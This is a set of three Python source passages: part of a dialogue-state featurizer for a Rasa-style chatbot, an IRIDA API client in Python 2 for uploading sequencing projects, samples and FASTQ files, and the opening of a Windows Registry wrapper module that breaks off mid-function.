) -> Dict[Text, int]:
# FIXME: the code below is not type-safe, but fixing it
# would require more refactoring, for instance using
# data classes in our states
if attribute in {INTENT, ACTION_NAME}:
return {sub_state[attribute]: 1} # type: ignore[dict-item]
elif attribute == ENTITIES:
return {entity: 1 for entity in sub_state.get(ENTITIES, [])}
elif attribute == ACTIVE_LOOP:
return {sub_state["name"]: 1} # type: ignore[dict-item]
elif attribute == SLOTS:
return {
f"{slot_name}_{i}": value
for slot_name, slot_as_feature in sub_state.items()
for i, value in enumerate(slot_as_feature)
}
else:
raise ValueError(
f"Given attribute '{attribute}' is not supported. "
f"It must be one of '{self._default_feature_states.keys()}'."
)
def _create_features(
self, sub_state: SubState, attribute: Text, sparse: bool = False
) -> List[Features]:
state_features = self._state_features_for_attribute(sub_state, attribute)
features = np.zeros(len(self._default_feature_states[attribute]), np.float32)
for state_feature, value in state_features.items():
# check that the value is in default_feature_states to be able to assign
# its value
if state_feature in self._default_feature_states[attribute]:
features[self._default_feature_states[attribute][state_feature]] = value
features = np.expand_dims(features, 0)
if sparse:
features = scipy.sparse.coo_matrix(features)
return [
Features(
features, FEATURE_TYPE_SENTENCE, attribute, self.__class__.__name__
)
]
@staticmethod
def _to_sparse_sentence_features(
sparse_sequence_features: List[Features],
) -> List[Features]:
return [
Features(
scipy.sparse.coo_matrix(feature.features.sum(0)),
FEATURE_TYPE_SENTENCE,
feature.attribute,
feature.origin,
)
for feature in sparse_sequence_features
]
@staticmethod
def _get_name_attribute(attributes: Set[Text]) -> Optional[Text]:
# there is always either INTENT or ACTION_NAME
return next(
(
attribute
for attribute in attributes
if attribute in {INTENT, ACTION_NAME}
),
None,
)
def _extract_state_features(
self,
sub_state: SubState,
precomputations: Optional[MessageContainerForCoreFeaturization],
sparse: bool = False,
) -> Dict[Text, List[Features]]:
# Remove entities from possible attributes
attributes = set(
attribute for attribute in sub_state.keys() if attribute != ENTITIES
)
if precomputations is not None:
# Collect features for all those attributes
attributes_to_features = precomputations.collect_features(
sub_state, attributes=attributes
)
# if features for INTENT or ACTION_NAME exist,
# they are always sparse sequence features;
# transform them to sentence sparse features
if attributes_to_features.get(INTENT):
attributes_to_features[INTENT] = self._to_sparse_sentence_features(
attributes_to_features[INTENT]
)
if attributes_to_features.get(ACTION_NAME):
attributes_to_features[ACTION_NAME] = self._to_sparse_sentence_features(
attributes_to_features[ACTION_NAME]
)
# Combine and sort the features:
# Per attribute, combine features of same type and level into one Feature,
# and (if there are any such features) store the results in a list where
# - all the sparse features are listed first and a
# - sequence feature is always listed before the sentence feature of the
# same type (sparse/not sparse).
output = {
attribute: Features.reduce(
features_list=features_list, expected_origins=None
)
for attribute, features_list in attributes_to_features.items()
if len(features_list) > 0 # otherwise, following will fail
}
else:
output = {}
# Check that the name attribute has features
name_attribute = self._get_name_attribute(attributes)
if name_attribute and name_attribute not in output:
# nlu pipeline didn't create features for user or action
# this might happen, for example, when we have action_name in the state
# but it did not get featurized because only character level
# CountVectorsFeaturizer was included in the config.
output[name_attribute] = self._create_features(
sub_state, name_attribute, sparse
)
return output
def encode_state(
self,
state: State,
precomputations: Optional[MessageContainerForCoreFeaturization],
) -> Dict[Text, List[Features]]:
"""Encode the given state.
Args:
state: The state to encode
precomputations: Contains precomputed features and attributes.
Returns:
A dictionary of state_type to list of features.
"""
state_features = {}
for state_type, sub_state in state.items():
if state_type == PREVIOUS_ACTION:
state_features.update(
self._extract_state_features(
sub_state, precomputations=precomputations, sparse=True,
)
)
# featurize user only if it is "real" user input,
# i.e. input from a turn after action_listen
if state_type == USER and is_prev_action_listen_in_state(state):
state_features.update(
self._extract_state_features(
sub_state, precomputations=precomputations, sparse=True,
)
)
if sub_state.get(ENTITIES):
state_features[ENTITIES] = self._create_features(
sub_state, ENTITIES, sparse=True
)
if state_type in {SLOTS, ACTIVE_LOOP}:
state_features[state_type] = self._create_features(
sub_state, state_type, sparse=True
)
return state_features
def encode_entities(
self,
entity_data: Dict[Text, Any],
precomputations: Optional[MessageContainerForCoreFeaturization],
bilou_tagging: bool = False,
) -> Dict[Text, List[Features]]:
"""Encode the given entity data.
Produce numeric entity tags for tokens.
Args:
entity_data: The dict containing the text and entity labels and locations
precomputations: Contains precomputed features and attributes.
bilou_tagging: indicates whether BILOU tagging should be used or not
Returns:
A dictionary of entity type to list of features.
"""
# TODO
# The entity states used to create the tag-idx-mapping contains the
# entities and the concatenated entity and roles/groups. We do not
# distinguish between entities and roles/groups right now.
if (
not entity_data
or not self.entity_tag_specs
or self.entity_tag_specs[0].num_tags < 2
):
# we cannot build a classifier with fewer than 2 classes
return {}
message = precomputations.lookup_message(user_text=entity_data[TEXT])
message.data[ENTITIES] = entity_data[ENTITIES]
if not message:
return {}
if bilou_tagging:
bilou_utils.apply_bilou_schema_to_message(message)
return {
ENTITY_TAGS: [
model_data_utils.get_tag_ids(
message, self.entity_tag_specs[0], bilou_tagging
)
]
}
def _encode_action(
self,
action: Text,
precomputations: Optional[MessageContainerForCoreFeaturization],
) -> Dict[Text, List[Features]]:
if action in self.action_texts:
action_as_sub_state = {ACTION_TEXT: action}
else:
action_as_sub_state = {ACTION_NAME: action}
return self._extract_state_features(
action_as_sub_state, precomputations=precomputations
)
def encode_all_labels(
self,
domain: Domain,
precomputations: Optional[MessageContainerForCoreFeaturization],
) -> List[Dict[Text, List[Features]]]:
"""Encode all action from the domain.
Args:
domain: The domain that contains the actions.
precomputations: Contains precomputed features and attributes.
Returns:
A list of encoded actions.
"""
return [
self._encode_action(action, precomputations)
for action in domain.action_names_or_texts
]
class IntentTokenizerSingleStateFeaturizer(SingleStateFeaturizer):
"""A SingleStateFeaturizer for use with policies that predict intent labels."""
def _encode_intent(
self,
intent: Text,
precomputations: Optional[MessageContainerForCoreFeaturization],
) -> Dict[Text, List[Features]]:
"""Extracts a numeric representation of an intent.
Args:
intent: Intent to be encoded.
precomputations: Contains precomputed features and attributes.
Returns:
Encoded representation of intent.
"""
intent_as_sub_state = {INTENT: intent}
return self._extract_state_features(intent_as_sub_state, precomputations)
def encode_all_labels(
self,
domain: Domain,
precomputations: Optional[MessageContainerForCoreFeaturization],
) -> List[Dict[Text, List[Features]]]:
"""Encodes all relevant labels from the domain using the given precomputations.
Args:
domain: The domain that contains the labels.
precomputations: Contains precomputed features and attributes.
Returns:
A list of encoded labels.
"""
return [
self._encode_intent(intent, precomputations) for intent in domain.intents
]
| |
import ast
import json
import httplib
import itertools
from urllib2 import urlopen, URLError
from urlparse import urljoin
from time import time
from copy import deepcopy
from os import path
import logging
import threading
from rauth import OAuth2Service
from requests.adapters import HTTPAdapter
from requests.exceptions import HTTPError as request_HTTPError
from Model.Project import Project
from Model.Sample import Sample
from Exceptions.ProjectError import ProjectError
from Exceptions.SampleError import SampleError
from Exceptions.SequenceFileError import SequenceFileError
from Exceptions.SampleSheetError import SampleSheetError
from Validation.offlineValidation import validate_URL_form
from API.pubsub import send_message
HTTP_MAX_RETRIES = 5
HTTP_BACKOFF_FACTOR = 1
class ApiCalls(object):
_instance = None
def __new__(cls, client_id, client_secret, base_URL, username, password, max_wait_time=20):
"""
Overriding __new__ to implement a singleton
This is done instead of a decorator so that mocking still works for class.
If the instance has not been created yet, or the passed in arguments are different, create a new instance,
and drop the old (if existing) instance
If the instance already exists and is valid, return the instance
arguments:
client_id -- client_id for creating access token.
client_secret -- client_secret for creating access token.
base_URL -- url of the IRIDA server
username -- username for server
password -- password for given username
max_wait_time -- timeout (seconds), default=20
"""
if not ApiCalls._instance or ApiCalls._instance.parameters_are_different(
client_id, client_secret, base_URL,username, password, max_wait_time):
# Create a new instance of the API
ApiCalls._instance = object.__new__(cls)
# initialize API instance variables
ApiCalls._instance.client_id = client_id
ApiCalls._instance.client_secret = client_secret
ApiCalls._instance.base_URL = base_URL
ApiCalls._instance.username = username
ApiCalls._instance.password = password
ApiCalls._instance.max_wait_time = max_wait_time
# initialize API object
ApiCalls._instance._session_lock = threading.Lock()
ApiCalls._instance._session_set_externally = False
ApiCalls._instance.create_session()
ApiCalls._instance.cached_projects = None
ApiCalls._instance.cached_samples = {}
return ApiCalls._instance
@classmethod
def close(cls):
"""
Close the current session by setting the current instance to None so
the next call with re-initialize the session
"""
ApiCalls._instance = None
def parameters_are_different(self, client_id, client_secret, base_URL, username, password, max_wait_time):
"""
Compare the current instance variables with a new set of variables
"""
result = (self.client_id != client_id or
self.client_secret != client_secret or
self.base_URL != base_URL or
self.username != username or
self.password != password or
self.max_wait_time != max_wait_time)
if result:
logging.warning("ApiCalls session instance parameters are different, "
"a new session instance will be created")
return result
@property
def session(self):
if self._session_set_externally:
return self._session
try:
self._session_lock.acquire()
response = self._session.options(self.base_URL)
if response.status_code != httplib.OK:
raise Exception
else:
logging.debug("Existing session still works, going to reuse it.")
except:
logging.debug("Token is probably expired, going to get a new session.")
oauth_service = self.get_oauth_service()
access_token = self.get_access_token(oauth_service)
new_session = oauth_service.get_session(access_token)
self._session = self.add_timeout_backoff(new_session)
finally:
self._session_lock.release()
return self._session
@session.setter
def session(self, session):
self._session = session
self._session_set_externally = True
def create_session(self):
"""
create session to be re-used until expiry for get and post calls
returns session (OAuth2Session object)
"""
self.cached_projects = None
# set http backoff option
self.http_max_retries = HTTP_MAX_RETRIES
self.http_backoff_factor = HTTP_BACKOFF_FACTOR
if self.base_URL[-1:] != "/":
self.base_URL = self.base_URL + "/"
if validate_URL_form(self.base_URL):
oauth_service = self.get_oauth_service()
access_token = self.get_access_token(oauth_service)
new_session = oauth_service.get_session(access_token)
self._session = self.add_timeout_backoff(new_session)
if self.validate_URL_existence(self.base_URL, use_session=True) is False:
raise Exception("Cannot create session. Verify your credentials are correct.")
else:
raise URLError(self.base_URL + " is not a valid URL")
def add_timeout_backoff(self, new_session):
# method stolen from https://www.programcreek.com/python/example/102997/requests.adapters example 3
# Adds a retry counter and backoff to requests that timeout
try:
# Some older versions of requests to not have the urllib3
# vendorized package
from requests.packages.urllib3.util.retry import Retry
except ImportError:
retries = self.http_max_retries
else:
# use a requests session to reuse connections between requests
retries = Retry(
total=self.http_max_retries,
read=self.http_max_retries,
backoff_factor=self.http_backoff_factor,
status_forcelist=[408, 504, 522, 524]
)
new_session.mount('https://', HTTPAdapter(max_retries=retries))
new_session.mount('http://', HTTPAdapter(max_retries=retries))
return new_session
def get_oauth_service(self):
"""
get oauth service to be used to get access token
returns oauthService
"""
access_token_url = urljoin(self.base_URL, "oauth/token")
oauth_serv = OAuth2Service(
client_id=self.client_id,
client_secret=self.client_secret,
name="irida",
access_token_url=access_token_url,
base_url=self.base_URL
)
return oauth_serv
def get_access_token(self, oauth_service):
"""
get access token to be used to get session from oauth_service
arguments:
oauth_service -- O2AuthService from get_oauth_service
returns access token
"""
params = {
"data": {
"grant_type": "password",
"client_id": self.client_id,
"client_secret": self.client_secret,
"username": self.username,
"password": self.password
}
}
access_token = oauth_service.get_access_token(
decoder=self.decoder, **params)
return access_token
def decoder(self, return_dict):
"""
safely parse given dictionary
arguments:
return_dict -- access token dictionary
returns evaluated dictionary
"""
irida_dict = ast.literal_eval(return_dict)
return irida_dict
def validate_URL_existence(self, url, use_session=False):
"""
tries to validate existence of given url by trying to open it.
true if HTTP OK, false if HTTP NOT FOUND otherwise
raises error containing error code and message
arguments:
url -- the url link to open and validate
use_session -- if True then this uses self.session.get(url) instead
of urlopen(url) to get response
returns
true if http response OK 200
false if http response NOT FOUND 404
"""
if use_session:
response = self.session.get(url)
if response.status_code == httplib.OK:
return True
elif response.status_code == httplib.NOT_FOUND:
return False
else:
raise Exception(
str(response.status_code) + " " + response.reason)
else:
response = urlopen(url, timeout=self.max_wait_time)
if response.code == httplib.OK:
return True
elif response.code == httplib.NOT_FOUND:
return False
else:
raise Exception(str(response.code) + " " + response.msg)
def get_link(self, targ_url, target_key, targ_dict=""):
"""
makes a call to targ_url(api) expecting a json response
tries to retrieve target_key from response to find link to resource
raises exceptions if target_key not found or targ_url is invalid
arguments:
targ_url -- URL to retrieve link from
target_key -- name of link (e.g projects or project/samples)
targ_dict -- optional dict containing key and value to search
in targets.
(e.g {key="identifier",value="100"} to retrieve where
identifier=100)
returns link if it exists
"""
if self.validate_URL_existence(targ_url, use_session=True):
response = self.session.get(targ_url)
if len(targ_dict) > 0:
resources_list = response.json()["resource"]["resources"]
try:
links_list = next(r["links"] for r in resources_list
if r[targ_dict["key"]].lower() ==
targ_dict["value"].lower())
except KeyError:
raise KeyError(targ_dict["key"] + " not found." +
" Available keys: " +
", ".join(resources_list[0].keys()))
except StopIteration:
raise KeyError(targ_dict["value"] + " not found.")
else:
links_list = response.json()["resource"]["links"]
try:
ret_val = next(link["href"] for link in links_list
if link["rel"] == target_key)
except StopIteration:
raise KeyError(target_key + " not found in links. " +
"Available links: " +
", ".join(
[str(link["rel"]) for link in links_list]))
else:
raise request_HTTPError("Error: " +
targ_url + " is not a valid URL")
return ret_val
def get_projects(self):
"""
API call to api/projects to get list of projects
returns list containing projects. each project is Project object.
"""
if self.cached_projects is None:
logging.info("Loading projects from server.")
url = self.get_link(self.base_URL, "projects")
response = self.session.get(url)
result = response.json()["resource"]["resources"]
try:
project_list = [
Project(
projDict["name"],
projDict["projectDescription"],
projDict["identifier"]
)
for projDict in result
]
except KeyError, e:
e.args = map(str, e.args)
msg_arg = " ".join(e.args)
raise KeyError(msg_arg + " not found." + " Available keys: " +
", ".join(result[0].keys()))
self.cached_projects = project_list
else:
logging.info("Loading projects from cache.")
return self.cached_projects
def get_samples(self, project=None, sample=None):
"""
API call to api/projects/project_id/samples
arguments:
project -- a Project object used to get project_id
returns list of samples for the given project.
each sample is a Sample object.
"""
if sample is not None:
project_id = sample.get_project_id()
elif project is not None:
project_id = project.get_id()
else:
raise Exception("Missing project or sample object.")
if project_id not in self.cached_samples:
try:
proj_URL = self.get_link(self.base_URL, "projects")
url = self.get_link(proj_URL, "project/samples",
targ_dict={
"key": "identifier",
"value": project_id
})
except StopIteration:
raise ProjectError("The given project ID: " + project_id + " doesn't exist")
response = self.session.get(url)
result = response.json()["resource"]["resources"]
self.cached_samples[project_id] = [Sample(sample_dict) for sample_dict in result]
return self.cached_samples[project_id]
def get_sequence_files(self, sample):
"""
API call to api/projects/project_id/sample_id/sequenceFiles
arguments:
sample -- a Sample object used to get sample_id
returns list of sequencefile dictionary for given sample_id
"""
project_id = sample.get_project_id()
sample_id = sample.get_id()
try:
proj_URL = self.get_link(self.base_URL, "projects")
sample_URL = self.get_link(proj_URL, "project/samples",
targ_dict={
"key": "identifier",
"value": project_id
})
except StopIteration:
raise ProjectError("The given project ID: " +
project_id + " doesn't exist")
try:
url = self.get_link(sample_URL, "sample/sequenceFiles",
targ_dict={
"key": "sampleName",
"value": sample_id
})
response = self.session.get(url)
except StopIteration:
raise SampleError("The given sample ID: {} doesn't exist".format(sample_id), [])
result = response.json()["resource"]["resources"]
return result
def send_project(self, project, clear_cache=True):
"""
post request to send a project to IRIDA via API
the project being sent requires a name that is at least
5 characters long
arguments:
project -- a Project object to be sent.
returns a dictionary containing the result of post request.
when post is successful the dictionary it returns will contain the same
name and projectDescription that was originally sent as well as
additional keys like createdDate and identifier.
when post fails then an error will be raised so return statement is
not even reached.
"""
if clear_cache:
self.cached_projects = None
json_res = {}
if len(project.get_name()) >= 5:
url = self.get_link(self.base_URL, "projects")
json_obj = json.dumps(project.get_dict())
headers = {
"headers": {
"Content-Type": "application/json"
}
}
response = self.session.post(url, json_obj, **headers)
if response.status_code == httplib.CREATED: # 201
json_res = json.loads(response.text)
else:
raise ProjectError("Error: " +
str(response.status_code) + " " +
response.text)
else:
raise ProjectError("Invalid project name: " +
project.get_name() +
". A project requires a name that must be " +
"5 or more characters.")
return json_res
def send_samples(self, samples_list):
"""
post request to send sample(s) to the given project
the project that the sample will be sent to is in its dictionary's
"sampleProject" key
arguments:
samples_list -- list containing Sample object(s) to send
returns a list containing dictionaries of the result of post request.
"""
self.cached_samples = {} # reset the cache, we're updating stuff
self.cached_projects = None
json_res_list = []
for sample in samples_list:
try:
project_id = sample.get_project_id()
proj_URL = self.get_link(self.base_URL, "projects")
url = self.get_link(proj_URL, "project/samples",
targ_dict={
"key": "identifier",
"value": project_id
})
except StopIteration:
raise ProjectError("The given project ID: " +
project_id + " doesn't exist")
headers = {
"headers": {
"Content-Type": "application/json"
}
}
json_obj = json.dumps(sample, cls=Sample.JsonEncoder)
response = self.session.post(url, json_obj, **headers)
if response.status_code == httplib.CREATED: # 201
json_res = json.loads(response.text)
json_res_list.append(json_res)
else:
logging.error("Didn't create sample on server, response code is [{}] and error message is [{}]".format(response.status_code, response.text))
e = SampleError("Error {status_code}: {err_msg}.\nSample data: {sample_data}".format(status_code=str(response.status_code), err_msg=response.text, sample_data=str(sample)), ["IRIDA rejected the sample."])
send_message(sample.upload_failed_topic, exception = e)
raise e
return json_res_list
def get_file_size_list(self, samples_list):
"""
calculate file size for the files in a sample
arguments:
samples_list -- list containing Sample object(s)
returns list containing file sizes for each sample's files
"""
file_size_list = []
for sample in samples_list:
bytes_read_size = sample.get_files_size()
file_size_list.append(bytes_read_size)
sample.pair_files_byte_size = bytes_read_size
return file_size_list
def send_sequence_files(self, samples_list, upload_id=1):
"""
send sequence files found in each sample in samples_list
the files to be sent is in sample.get_files()
this function iterates through the samples in samples_list and send
them to _send_sequence_files() which actually makes the connection
to the api in order to send the data
arguments:
samples_list -- list containing Sample object(s)
upload_id -- the run to send the files to
returns a list containing dictionaries of the result of post request.
"""
json_res_list = []
file_size_list = self.get_file_size_list(samples_list)
self.size_of_all_seq_files = sum(file_size_list)
self.total_bytes_read = 0
self.start_time = time()
for sample in samples_list:
try:
json_res = self._send_sequence_files(sample, upload_id)
json_res_list.append(json_res)
except Exception, e:
logging.error("The upload failed for unexpected reasons, informing the UI.")
send_message(sample.upload_failed_topic, exception = e)
raise
return json_res_list
def _kill_connections(self):
"""Terminate any currently running uploads.
This method simply sets a flag to instruct any in-progress generators called
by `_send_sequence_files` below to stop generating data and raise an exception
that will set the run to an error state on the server.
"""
self._stop_upload = True
self.session.close()
def _send_sequence_files(self, sample, upload_id):
"""
post request to send sequence files found in given sample argument
raises error if either project ID or sample ID found in Sample object
doesn't exist in irida
arguments:
sample -- Sample object
upload_id -- the run to upload the files to
returns result of post request.
"""
json_res = {}
self._stop_upload = False
try:
project_id = sample.get_project_id()
proj_URL = self.get_link(self.base_URL, "projects")
samples_url = self.get_link(proj_URL, "project/samples",
targ_dict={
"key": "identifier",
"value": project_id
})
except StopIteration:
raise ProjectError("The given project ID: " + project_id + " doesn't exist")
try:
sample_id = sample.get_id()
seq_url = self.get_link(samples_url, "sample/sequenceFiles",
targ_dict={
"key": "sampleName",
"value": sample_id
})
except StopIteration:
raise SampleError("The given sample ID: {} doesn't exist".format(sample_id),
["No sample with name [{}] exists in project [{}]".format(sample_id, project_id)])
boundary = "B0undary"
read_size = 32768
def _send_file(filename, parameter_name, bytes_read=0):
"""This function is a generator that yields a multipart form-data
entry for the specified file. This function will yield `read_size`
bytes of the specified file name at a time as the generator is called.
This function will also terminate generating data when the field
`self._stop_upload` is set.
Args:
filename: the file to read and yield in `read_size` chunks to
the server.
parameter_name: the form field name to send to the server.
bytes_read: used for sending messages to the UI layer indicating
the total number of bytes sent when sending the sample
to the server.
"""
# Send the boundary header section for the file
logging.info("Sending the boundary header section for {}".format(filename))
yield ("\r\n--{boundary}\r\n"
"Content-Disposition: form-data; name=\"{parameter_name}\"; filename=\"{filename}\"\r\n"
"\r\n").format(boundary=boundary, parameter_name=parameter_name, filename=filename.replace("\\", "/"))
# Send the contents of the file, read_size bytes at a time until
# we've either read the entire file, or we've been instructed to
# stop the upload by the UI
logging.info("Starting to send the file {}".format(filename))
with open(filename, "rb", read_size) as fastq_file:
data = fastq_file.read(read_size)
while data and not self._stop_upload:
bytes_read += len(data)
send_message(sample.upload_progress_topic, progress=bytes_read)
yield data
data = fastq_file.read(read_size)
logging.info("Finished sending file {}".format(filename))
if self._stop_upload:
logging.info("Halting upload on user request.")
def _send_parameters(parameter_name, parameters):
"""This function is a generator that yields a multipart form-data
entry with additional file metadata.
Args:
parameter_name: the form field name to use to send to the server.
parameters: a JSON encoded object with the metadata for the file.
"""
logging.info("Going to send parameters for {}".format(parameter_name))
yield ("\r\n--{boundary}\r\n"
"Content-Disposition: form-data; name=\"{parameter_name}\"\r\n"
"Content-Type: application/json\r\n\r\n"
"{parameters}\r\n").format(boundary=boundary, parameter_name=parameter_name, parameters=parameters)
def _finish_request():
"""This function is a generator that yields the terminal boundary
entry for a multipart form-data upload."""
yield "--{boundary}--".format(boundary=boundary)
def _sample_upload_generator(sample):
"""This function accepts the sample and composes a series of generators
that are used to send the file contents and metadata for the sample.
Args:
sample: the sample to send to the server
"""
bytes_read = 0
file_metadata = sample.get_sample_metadata()
file_metadata["miseqRunId"] = str(upload_id)
file_metadata_json = json.dumps(file_metadata)
if sample.is_paired_end():
# Compose a collection of generators to send both files of a paired-end
# file set and the corresponding metadata
return itertools.chain(
_send_file(filename=sample.get_files()[0], parameter_name="file1"),
_send_file(filename=sample.get_files()[1], parameter_name="file2", bytes_read=path.getsize(sample.get_files()[0])),
_send_parameters(parameter_name="parameters1", parameters=file_metadata_json),
_send_parameters(parameter_name="parameters2", parameters=file_metadata_json),
_finish_request())
else:
# Compose a generator to send the single file from a single-end
# file set and the corresponding metadata.
return itertools.chain(
_send_file(filename=sample.get_files()[0], parameter_name="file"),
_send_parameters(parameter_name="parameters", parameters=file_metadata_json),
_finish_request())
if sample.is_paired_end():
logging.info("sending paired-end file")
url = self.get_link(seq_url, "sample/sequenceFiles/pairs")
else:
logging.info("sending single-end file")
url = seq_url
send_message(sample.upload_started_topic)
logging.info("Sending files to [{}]".format(url))
response = self.session.post(url, data=_sample_upload_generator(sample),
headers={"Content-Type": "multipart/form-data; boundary={}".format(boundary)})
if self._stop_upload:
logging.info("Upload was halted on user request, raising exception so that server upload status is set to error state.")
raise SequenceFileError("Upload halted on user request.", [])
if response.status_code == httplib.CREATED:
json_res = json.loads(response.text)
logging.info("Finished uploading sequence files for sample [{}]".format(sample.get_id()))
send_message(sample.upload_completed_topic, sample=sample)
else:
e = SequenceFileError("Error {status_code}: {err_msg}\n".format(
status_code=str(response.status_code),
err_msg=response.reason))
logging.info("Got an error when uploading [{}]: [{}]".format(sample.get_id(), e))
logging.info(response.text)
send_message(sample.upload_failed_topic, exception=e)
raise e
return json_res
def create_seq_run(self, metadata_dict):
"""
Create a sequencing run.
the contents of metadata_dict are changed inside this method (THIS IS TERRIBLE)
uploadStatus "UPLOADING"
There are some parsed metadata keys from the SampleSheet.csv that are
currently not accepted/used by the API so they are discarded.
Everything not in the acceptable_properties list below is discarded.
arguments:
metadata_dict -- SequencingRun's metadata parsed from
a Samplesheet.csv file by
miseqParser.parse_metadata()
returns result of post request.
"""
json_res = {}
seq_run_url = self.get_link(self.base_URL, "sequencingRuns")
url = self.get_link(seq_run_url, "sequencingRun/miseq")
headers = {
"headers": {
"Content-Type": "application/json"
}
}
acceptable_properties = [
"layoutType", "chemistry", "projectName",
"experimentName", "application", "uploadStatus",
"investigatorName", "createdDate", "assay", "description",
"workflow", "readLengths"]
metadata_dict["uploadStatus"] = "UPLOADING"
for key in metadata_dict.keys():
if key not in acceptable_properties:
del metadata_dict[key]
json_obj = json.dumps(metadata_dict)
response = self.session.post(url, json_obj, **headers)
if response.status_code == httplib.CREATED: # 201
json_res = json.loads(response.text)
else:
raise SampleSheetError("Error: " +
str(response.status_code) + " " +
response.reason)
return json_res
def get_seq_runs(self):
"""
Get list of pair files SequencingRuns
/api/sequencingRuns returns all SequencingRuns so this method
checks each SequencingRuns's layoutType to be equal to "PAIRED_END"
if it is add it to the list
return list of paired files SequencingRuns
"""
url = self.get_link(self.base_URL, "sequencingRuns")
response = self.session.get(url)
json_res_list = response.json()["resource"]["resources"]
pair_seq_run_list = [json_res
for json_res in json_res_list
if json_res["layoutType"] == "PAIRED_END"]
return pair_seq_run_list
def set_seq_run_complete(self, identifier):
"""
Update a sequencing run's upload status to "COMPLETE"
arguments:
identifier -- the id of the sequencing run to be updated
returns result of patch request
"""
status = "COMPLETE"
json_res = self._set_seq_run_upload_status(identifier, status)
return json_res
def set_seq_run_uploading(self, identifier):
"""
Update a sequencing run's upload status to "UPLOADING"
arguments:
identifier -- the id of the sequencing run to be updated
returns result of patch request
"""
status = "UPLOADING"
json_res = self._set_seq_run_upload_status(identifier, status)
return json_res
def set_seq_run_error(self, identifier):
"""
Update a sequencing run's upload status to "ERROR".
arguments:
identifier -- the id of the sequencing run to be updated
returns result of patch request
"""
status = "ERROR"
json_res = self._set_seq_run_upload_status(identifier, status)
return json_res
def _set_seq_run_upload_status(self, identifier, status):
"""
Update a sequencing run's upload status to the given status argument
arguments:
identifier -- the id of the sequencing run to be updated
status -- string that the sequencing run will be updated
with
returns result of patch request
"""
json_res = {}
seq_run_url = self.get_link(self.base_URL, "sequencingRuns")
url = self.get_link(seq_run_url, "self",
targ_dict={
"key": "identifier",
"value": identifier
})
headers = {
"headers": {
"Content-Type": "application/json"
}
}
update_dict = {"uploadStatus": status}
json_obj = json.dumps(update_dict)
response = self.session.patch(url, json_obj, **headers)
if response.status_code == httplib.OK: # 200
json_res = json.loads(response.text)
else:
raise SampleSheetError("Error: " +
str(response.status_code) + " " +
response.reason)
return json_res
| |
'''Module for accessing MWR.
This module provides an advanced, easy-to-use API for
accessing and mutating the Microsoft Windows Registry.'''
################################################################################
__version__ = '$Revision: 0 $'
__date__ = 'March 19, 2007'
__author__ = 'Stephen "Zero" Chappell <my.bios@gmail.com>'
__credits__ = '''\
S. Schaub, for introducing me to programming.
B. Gates, for creating the Windows Registry.
F. Drake, for enforcing good Python documentation.'''
################################################################################
import _winreg
import sys as _sys
import time as _time
################################################################################
class HKEY:
'Hive Constants'
CLASSES_ROOT = -2147483648
CURRENT_USER = -2147483647
LOCAL_MACHINE = -2147483646
USERS = -2147483645
CURRENT_CONFIG = -2147483643
class KEY:
'Mode Constants'
QUERY_VALUE = 1
SET_VALUE = 2
CREATE_SUB_KEY = 4
ENUMERATE_SUB_KEYS = 8
NOTIFY = 16
CREATE_LINK = 32
WRITE = 131078
EXECUTE = 131097
READ = 131097
ALL_ACCESS = 983103
class REG:
'Type Constants'
NONE = 0
SZ = 1
EXPAND_SZ = 2
BINARY = 3
DWORD = 4
DWORD_BIG_ENDIAN = 5
LINK = 6
MULTI_SZ = 7
RESOURCE_LIST = 8
FULL_RESOURCE_DESCRIPTOR = 9
RESOURCE_REQUIREMENTS_LIST = 10
QWORD = 11
################################################################################
class _Value(object):
'_Value(value) -> _Value'
def __init__(self, value):
'Initialize the _Value object.'
self.__value = value
self.__repr = '%s(%r)' % (self.__class__.__name__, value)
def __repr__(self):
'Return the object\'s representation.'
return self.__repr
def __get_value(self):
'Private class method.'
return self.__value
value = property(__get_value, doc='Value of this object.')
class REG_NONE(_Value): pass
class REG_SZ(_Value): pass
class REG_EXPAND_SZ(_Value): pass
class REG_BINARY(_Value): pass
class REG_DWORD(_Value): pass
class REG_DWORD_BIG_ENDIAN(_Value): pass
class REG_LINK(_Value): pass
class REG_MULTI_SZ(_Value): pass
class REG_RESOURCE_LIST(_Value): pass
class REG_FULL_RESOURCE_DESCRIPTOR(_Value): pass
class REG_RESOURCE_REQUIREMENTS_LIST(_Value): pass
class REG_QWORD(_Value): pass
################################################################################
class Registry(object):
'Registry([computer]) -> Registry'
def __init__(self, computer=None):
'Initialize the Registry object.'
self.__computer = computer
self.__repr = 'Registry()' if computer is None else 'Registry(%r)' % computer
def __repr__(self):
'Return the object\'s representation.'
return self.__repr
def __iter__(self):
'Iterate over hives defined in HKEY.'
return (Key(key, computer=self.__computer) for key in map(HKEY.__dict__.__getitem__, filter(str.isupper, dir(HKEY))))
def __HKEY_CLASSES_ROOT(self):
'Private class method.'
return Key(HKEY.CLASSES_ROOT, computer=self.__computer)
def __HKEY_CURRENT_USER(self):
'Private class method.'
return Key(HKEY.CURRENT_USER, computer=self.__computer)
def __HKEY_LOCAL_MACHINE(self):
'Private class method.'
return Key(HKEY.LOCAL_MACHINE, computer=self.__computer)
def __HKEY_USERS(self):
'Private class method.'
return Key(HKEY.USERS, computer=self.__computer)
def __HKEY_CURRENT_CONFIG(self):
'Private class method.'
return Key(HKEY.CURRENT_CONFIG, computer=self.__computer)
HKEY_CLASSES_ROOT = property(__HKEY_CLASSES_ROOT, doc='The CLASSES_ROOT hive.')
HKEY_CURRENT_USER = property(__HKEY_CURRENT_USER, doc='The CURRENT_USER hive.')
HKEY_LOCAL_MACHINE = property(__HKEY_LOCAL_MACHINE, doc='The LOCAL_MACHINE hive.')
HKEY_USERS = property(__HKEY_USERS, doc='The USERS hive.')
HKEY_CURRENT_CONFIG = property(__HKEY_CURRENT_CONFIG, doc='The CURRENT_CONFIG hive.')
################################################################################
class Key(object):
'''Key(key[, subkey][, mode][, computer]) -> Key
Key(key) -> Key
Key(key, subkey) -> Key
Key(key, mode=value) -> Key
Key(key, subkey, mode) -> Key
Key(key, computer=value) -> Key
Key(key, subkey, computer=value) -> Key
Key(key, mode=value, computer=value) -> Key
Key(key, subkey, mode, computer) -> Key'''
def __init__(self, key, subkey=None, mode=None, computer=None):
'Initialize the Key object.'
if isinstance(key, (int, _winreg.HKEYType)) and subkey is None and mode is None and computer is None:
self.__key = _winreg.OpenKey(key, '')
elif isinstance(key, Key) and subkey is None and mode is None and computer is None:
self.__key = _winreg.OpenKey(key.__key, '')
elif isinstance(key, (int, _winreg.HKEYType)) and isinstance(subkey, str) and mode is None and computer is None:
self.__key = _winreg.OpenKey(key, subkey)
elif isinstance(key, Key) and isinstance(subkey, str) and mode is None and computer is None:
